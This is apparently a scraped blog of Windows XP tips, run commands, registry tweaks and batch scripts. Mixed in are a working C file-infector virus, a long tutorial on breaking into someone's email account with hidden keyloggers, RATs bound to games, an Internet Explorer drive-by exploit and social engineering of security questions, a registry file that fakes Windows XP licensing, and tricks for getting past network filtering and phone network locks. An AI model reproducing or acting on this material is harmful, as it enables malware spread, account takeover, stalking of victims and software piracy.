Performance Monitor - perfmon.msc

Performance Monitor - perfmon

Phone and Modem Options - telephon.cpl

Phone Dialer - dialer

Pinball Game - pinball

Power Configuration - powercfg.cpl

Printers and Faxes - control printers

Printers Folder - printers

Private Character Editor - eudcedit


Q



Quicktime (If Installed) - QuickTime.cpl

Quicktime Player (if installed) - quicktimeplayer



R

Real Player (if installed) - realplay

Regional Settings - intl.cpl

Registry Editor - regedit

Registry Editor - regedit32

Remote Access Phonebook - rasphone

Remote Desktop - mstsc

Removable Storage - ntmsmgr.msc

Removable Storage Operator Requests - ntmsoprq.msc

Resultant Set of Policy (XP Prof) - rsop.msc



S
Scanners and Cameras - sticpl.cpl

Scheduled Tasks - control schedtasks

Security Center - wscui.cpl

Services - services.msc

Shared Folders - fsmgmt.msc

Shuts Down Windows - shutdown

Sounds and Audio - mmsys.cpl

Spider Solitare Card Game - spider

SQL Client Configuration - cliconfg

System Configuration Editor - sysedit

System Configuration Utility - msconfig

System File Checker Utility (Scan Immediately) - sfc /scannow

System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce

System File Checker Utility (Scan On Every Boot)- sfc /scanboot

System File Checker Utility (Return to Default Setting) - sfc /revert

System File Checker Utility (Purge File Cache) - sfc /purgecache

System File Checker Utility (Set Cache Size to size x) - sfc /cachesize=x

System Information - msinfo32

System Properties - sysdm.cpl


T


Task Manager - taskmgr

TCP Tester - tcptest

Telnet Client - telnet

Tweak UI (if installed) - tweakui


U


User Account Management - nusrmgr.cpl

Utility Manager - utilman


W


Windows Address Book - wab

Windows Address Book Import Utility - wabmig

Windows Backup Utility (if installed) - ntbackup

Windows Explorer - explorer

Windows Firewall - firewall.cpl

Windows Address Book - wab

Windows Address Book Import Utility - wabmig

Windows Backup Utility (if installed) - ntbackup

Windows Explorer - explorer

Windows Firewall - firewall.cpl

Windows Magnifier - magnify

Windows Management Infrastructure - wmimgmt.msc

Windows Media Player - wmplayer

Windows Messenger - msmsgs

Windows Picture Import Wizard (need camera connected) - wiaacmgr

Windows System Security Tool - syskey

Windows Update Launches - wupdmgr

Windows Version (to show which version of windows) - winver

Windows XP Tour Wizard - tourstart

Thursday

SHUTDOWN SHORTCUT

1st right click on your desktop & then goto shortcut.
2nd in shortcut type"shutdown -s -t (time in sec.) -c"put your msg"
enjoy

HOW TO BYPASS CYBEROM????

In this matter you should have mozila firefox browser.
just login from internet exploler & login into your client account.
open mozila firefox.

and then goto " tools>option>advanced>network>setting"

and select manual proxy setting & paste your proxy address........
it will allow you to acess any site..
enjoy!!!

Matrix effect in pc!!

Excellent Trick For Matrix Effect You Wont Believe This Tricks ... This is a Master piece..

just follow the steps and see the amazing matrix effect happen in your DOS window:

1. Open Notepad.
2.Copy the below mentioned text in your notepad file:

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

3. Save the file with .bat extension like Matrix.bat

Thats it. Just open the file to see the matrix effect right before your eyes!

Say Thanks and Make a Comment If U Like this Post

Wednesday

Access your folders as a Drive

Fool 'Computer Beginners' or your 'Friends' (Non-Expert) , as the drive will show Disk Space of the folder's drive so it seems that the disk space has increased !!!

Do The Follwing :

Start >> Run

Type cmd and hit Enter

This will open "Command Prompt"

Type subst Z: E:\folder and hit Enter key.

You can replace Z: with your desired New Drive Letter (Except existing Drive letters)

You can replace E:\folder with the path of your favorite folder

Now, type exit

This creates a new drive ! When you open this , it will open your folder !!!



But a Problem !
On Restart the Virtual Drive Disappears !!!

-------------------------------------------------------------

Solution !

-------------------------------------------------------------

? We can make a batch file which will make the drive everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

subst Z: E:\folder

exit

? File >> Save As...

? Name it : Virtual Drive Emulator.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virtual Drive Emulator.bat file here !
now the drive will automatically be created when ever you start your pc

Access your folders as a Drive

Fool 'Computer Beginners' or your 'Friends' (Non-Expert) , as the drive will show Disk Space of the folder's drive so it seems that the disk space has increased !!!

Do The Follwing :

Start >> Run

Type cmd and hit Enter

This will open "Command Prompt"

Type subst Z: E:\folder and hit Enter key.

You can replace Z: with your desired New Drive Letter (Except existing Drive letters)

You can replace E:\folder with the path of your favorite folder

Now, type exit

This creates a new drive ! When you open this , it will open your folder !!!



But a Problem !
On Restart the Virtual Drive Disappears !!!

-------------------------------------------------------------

Solution !

-------------------------------------------------------------

? We can make a batch file which will make the drive everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

subst Z: E:\folder

exit

? File >> Save As...

? Name it : Virtual Drive Emulator.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virtual Drive Emulator.bat file here !
now the drive will automatically be created when ever you start your pc

Tuesday

Make windows xp genune!!

here one rigistry value is written you just paste it in notpad & save as anything.reg

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-1011873-23081"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,\
31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98,5c,00,00,\
00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,00,00,b5,16,\
00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,e5,70,f3
"LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,\
d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9,9a,35,17,46,7a,4f,91,fc,\
4a,d9,db,64,5c,c4,e2,0f,34,f3,ea

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd

* In notepad click then.
* For file type in the save dialog box select "all files" and for the filename type in License Key.reg or whatever you want. It doesn't matter as long as it has the .reg extension.
* Click save.
* Double click the file thats now on your desktop. It will ask you are you sure. Tell it yes.

EDIT ANY SITE

I have typed one java script.
it will help you to edit any site.

javascript:nick=document.body;nick.contentEditable='true'; document.designMode='on'; void(0)

just copy it & paste in your address bar.

enjoy!!

DONT FORGET TO COMMENT

Monday

DISABLE YOUR TASK MANAGER

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\System And create a New DWord Value with the name: DisableTaskMgr Set its Value 0 for Enabling Task Manager and 1 for Disabling Task Manager.

ENJOY!
DONT FORGET TO COMMENT

WANT TO MAKE VIRUS IN C????

i have type one virus programming just copy it dont run it on your pc.
i am not taking any responcibility


#include
#include
#include
#include
#include
#include
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %sn”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SECn”,
(end-st)/CLK_TCK);
getch();
}

dont forget to comment
Posted by Siddharth solanki at 00:39 0

Sunday

SPEAKING PC

HERE i m posting one script using that script you can make speaking pc

Dim message, sapi
message=InputBox("What do you want me to say?","computertipsnfacts.blogspot.com")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message


just save above as anything.vbs


dont forget to comment

cool move of your browser

here one java seript which can move your browser


javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0)

psate the above script in your addressbar & hit enter


DONT FORGET TO COMMENT

Saturday

Break Into Email Accounts

Disclaimer :

I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!

Introduction



I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.


Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...


Things You Should Know



As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.


If You Have Physical Access



I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.


One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).


Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try).


Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....


www.download-freeware-shareware.com/Freeware-Internet.php?Type=4171




Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.



One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...




Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it




Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...



If You Don't Have Physical Access




Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.


To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...



On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).


If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.


The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.


So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.


Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.


Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...




While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8


Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...

Xp Registry tricks

Its a mixed bag.. a compilation of all the tricks..
many tricks are what i discovered..
many are shared ..
keep posting if u know more



Display Your Quick Launch ToolbarTip:


Is your Quick Launch toolbar missing from the taskbar?
To display your familiar Quick Launch toolbar:
Right-click an empty area on the taskbar, click Toolbars, and then click Quick Launch.

Easy as that your Quick Launch bar appears. To add items to your Quick Launch toolbar, click the icon for the program you want to add, and drag it to the Quick Launch portion of the taskbar.


--------------------------------------------------------------------------------

How to remove recycle bin from your desktop Tip:

Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.

--------------------------------------------------------------------------------

How to stop new programs installed balloon from coming up tip:

Right click on START button and select properties. Click on Customize and go to Advanced tab and deselect check box saying "Highlight newly installed programs". This would help you stop this annoying feature from popping up every now and then.



--------------------------------------------------------------------------------
Unlock Toolbars to Customize Them Tip:

The new Windows XP now features locking toolbars, and you can adjust them. You may customize a lot of the Windows XP features such as the Taskbar, Start Menu, and even toolbar icons in Internet Explorer and Outlook Express. Remember your right-click:
* Right-click on a toolbar, and then click Lock the Toolbars to remove the check mark.
* Right-click on the toolbar again, and then click Customize.

You may add or remove toolbar buttons, change text options and icon options. When you've got the toolbar customized, click Close. Now right-click on the toolbar and then click Lock the Toolbars to lock them in place. com


--------------------------------------------------------------------------------

Want to remove shared documents folder from My Computer window tip:

Some don't like my shared documents folder option. If you are one of that, here is a trick to remove it.Open registry editor by going to START-RUN and entering regedit.
Once in registry, navigate to key HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

How to improve on shutdown time ? Close apps automatically & quickly at shutdown tip:

Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP and look for AutoEndTasks. On my computer default value is 0. Change it to 1. Thats all. Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications.
In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500 (since default value for HungAppTimeout 5000 and for WaitToKillAppTimeout is 20000)


--------------------------------------------------------------------------------
Are you missing icons Tip:


Are you missing icons? You may be wondering where all the icons from your desktop are in Windows XP? Well if you're like me, you like to have at least My Computer, My Network Places, and My Documents on the your desktop.
You need to:
* Right-click on the desktop, and then click Properties.
* Click the Desktop tab and then click on Customize Desktop.
* Put a check mark in the box next to My Document, My Computer, My Network Places, or Internet Explorer, to add those familiar icons to your desktop. Easy yes!

--------------------------------------------------------------------------------

How to login as administrator if you don't see it available tip:

Unless and until you have run into issues and fixing XP (underwhich case you have to go to Safe Mode to login as Administrator), you can get to administrator screen by simply pressing CTRL+ALT+DELETE twice at the main screen.

--------------------------------------------------------------------------------

Speedup boot up sequence by defragmenting all key boot files tip:

Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction. In right hand panel look for Enable. Right click on it and set it 'Y' for enable. This is the way I have it set on my computer. This will help speedup boot time.


Use a Shortcut to Local Area Network Connection Information:


--------------------------------------------------------------------------------

Use a Shortcut to Local Area Network Connection Information Tip:


Here's something new in Windows XP, instead of using the command line program and typing ipconfig to get local area network information, you can try using the following shortcut:
* Click on Start, point to Connect to, and then click Show All Connections.
* Right–click the connection you want information about, and then click Status.
* In the connection Properties dialog box, click the Support tab.
* For more information, click on the Advanced tab.

To automatically enable the status monitor each time the connection is active, in the connection Properties dialog box, select the Show icon in taskbar notification area when connected check box.

--------------------------------------------------------------------------------

Do you know you can have Virtual Desktops (like in Linux) with PowerToys ?

If you have powertoys installed on Windows XP Its available for free at Microsoft download webpage. It is very easy to enable Microsoft Virtual Desktop Feature. Simply right click on the Start Panel Bar also called TaskBar, Click on Tool Bar and select Desktop manager.
You would see a set of 5 icons placed on the right portion of the TAskBar. Click on number 1 to 4 to go to any of the desktops. Now you have have four different Active Desktops.
IMPORTANT NOTE: You may see a little degradation in performance.

--------------------------------------------------------------------------------

Customize Internet. Explorer Title bar tip:

This tip won't make your computer any faster but may help personalize your computer experience. Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet. Explorer\Main. In right hand panel look for string "Window Title" and change its value to whatever custom text you want to see.
--------------------------------------------------------------------------------

adding content to Right click credit : ashwin C1

Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path.

First we will add the copy and move options to the right click menu of all FILES.
CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this
key:
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers
Right click the ContextMenuHandlers key and choose New>Key.
Name the new key “Copy To” (without the quotes).
Repeat the above and create another new key named Move To.
You should now have two new subkeys under the ContextMenuHandlers key:
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers\Copy To
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers\Move To
Select the Copy To key and in the right hand pane, double click “Default”
Enter this clsid value as the value data:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
Next , select the Move To key and in the right hand pane set the default value to:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}
This now takes care of the Copy and Move options for the right click context menu of all your files.
Now all that is left is to add the same options to the right click menu of all your folders.
The procedure will be the same as for files but at a different key:
HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers
Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.
left click on the right hand pane, add the same default values as you did for Files:
For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
For the Move To:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}
Exit the registry and you are done.
Now when you right click on a file or folder, you should see two new options: Copy to Folder and Move to Folder

How Not To Get Hacked

Protect Urself !

Follow These Simple Guidelines n u are done


*** Under the security option tab of Mozilla Firefox there is an option Show Passwords make sure its protected by the master password.


1. U may avoid using Internet Explorer(old versions) and make the switch to Opera, it's more secure, plain and simple.

2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.

3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)

4. Update your anti virus,

5. Boot into safe mode and run all three scans (once in a month)

6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.

7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it, at least quarantine it.

8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.

9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.

10. Make sure your firewall doesn't have strange exceptions.

11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your major passwords, mostly bu using a virtual keyboard(to prevent keyloggers).

12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.

Good luck!


I am being stalked / spied . now what!!

As email providers give away more and more storage space, more and more personal information is being stored in those accounts. People are increasingly using their email accounts for more than just email - it has become their online document storage area with backup documents such as passwords, bank account numbers, account usernames, scans of correspondence and much more. Even if you don’t use your email for this purpose, you may still be inadvertantly revealing personal information in general conversation emails to family and close friends. A 6GB Gmail account or an unlimited space Yahoo account is potentially an information bonanza source for identity thieves who manage to figure out your email password and then go snooping. But if someone HAS cracked your email password, it may not be apparent to you. A snooper can easily read an email then mark it as unread again. So the best thing to do would be to set up an “electronic tripwire” so if someone breaks into your account, you’ll know about it. Here’s how to do it :
1. Sign up for a website hit counter at www.onestatfree.com. You can leave a fake name and whatever URL you want (I used Google.com for mine). 2. You will then receive a welcome email from OneStat with a text attachment called OneStatScript.txt. Download this attachment to your computer and then delete the email (you don’t want any email snoopers finding it later). But before deleting the email, write down your OneStat account number as you will need it later.3. Change the name of the text document to something that will make the email snooper salivate such as passwordlist. Also change the file format from a text document to a website page. So make it something like passwordlist.htm .4. Email this newly-renamed file as an attachment to the email account you want to monitor. Make sure the email subject title also lures the snooper in (maybe something like List of Passwords. You get the idea :).5. The trap is now set. Basically if someone opens the email and opens the attachment, OneStat will record a hit. If you then log into your OneStat account say once a day, you will see how many hits you have had to your attachment.
The OneStat account page then gives you details on each “visitor” including the date and time they accessed the web document and more importantly their location and IP address! So how does having this information help you? Well first of all, it will alert you to change your password to something stronger. Secondly, if you see the snooper’s location and you only know one or two people there then it narrows down your list of potential suspects. By the way, I recommended signing up for One Stat because the author of the original idea mentioned them. But if you know of any other hit counter services that send text documents your email address, then please mention them in the comments. I don’t have any financial advantage recommending One Stat so I am perfectly happy to consider alternative companies.

u may even use a return email notifications as read notify!!

Friday

Find who is Invisible on Yahoo messenger

Just go to

http://www.invisible.ir
http://www.xeeber.com

and enter victims Yahoo! ID… Click go and you are done!
credit : site contributer :

it works !!


Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:

2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below.So you know that the user is online.

Alternate Method:


Chose a person you want to check .Double click to open the chat window.Now simply invite the person for a voice conference.This is done by clicking on the "conference' button on the top of the chat window.
If the talk button appears and turns green then that person is online.But if you receive the message 'Voice chat could not be started ' then the person is offline.

Note:Some people use softwares like buddy spy to check who is invisible.I DONT RECOMMEND you to use such third party softwares as they can expose your Pc to hackers by sending your personal information and can even steal information from your Pc.So avoid such softwares and instead use the simple tricks given above.

If you have any queries or would like to make some useful contribution to this topic feel free to drop a line in the comments section.

Nokia All Codes

*** WARNING: Using secret codes may be harmful to your phone and result in disabling or worse. Use these codes at your own discretion, we accept no responsiblility for blocked pones while using these codes!!!
IMEI Number
*#06# Cells Identity Code (IMEI = International Mobile Equipment Identity)
XXXXXX XX XXXXXX X
TAC FAC SNR SP
TAC = Type Approval Code (first 2 digits = country code of the approval-country )
FAC = Final Assembly Code: (01,02 = AEG)
(10,20 Nokia)
(40,41,44 Siemens)
(30 Ericsson)
(50 Bosch)
(51 Sony,Siemens,Ericsson)
(60 Alcatel)
(65 AEG)
(70 Sagem)
(75 Dancall)
(80 Philips)
(85 Panasonic)
SNR = Serial Nr.
SP = Spare (always "0")

Software Version
*#0000# shows the software version
Signal Processing
*3370# - Enchanced full Rate Codec (EFR) activation. It will automatically restart.
#3370# - Enchanced full Rate Codec (EFR) deactivation
*4720# - Half Rate Codec activation. It will automatically restart.
#4720# - Half Rate Codec deactivation
Enchanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (AlgebraicCode Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced with about 5%



Sim Clock Stopping
*#746025625#
[*#sim0clock#]
Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.
It will tell you if it can be stopped or not.


Warrenty Menu
*#92702689# takes you to a secret menu with 6 choices:
[*#war0anty#]
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997).
3. Displays (if there) the date where the phone was purchased (MMYY).
4. Displays the date of the last repairment - if found (0000).
5. Makes you capable of transferring user data if you have the gear for it.
6. Shows how long the phone has been used to talk. This counter is not reset by when you "clear timers" like the counters in the call register.


Bypass the SP lock With a Nokia 16xx/21xx/31xx/51xx/81xx
1. Insert SIM card of different provider.
2. Turn on the phone and press the UP VOLUME key for 3 sec.
Then release it and the phone says PIN CODE?
3. Press the "C" key.
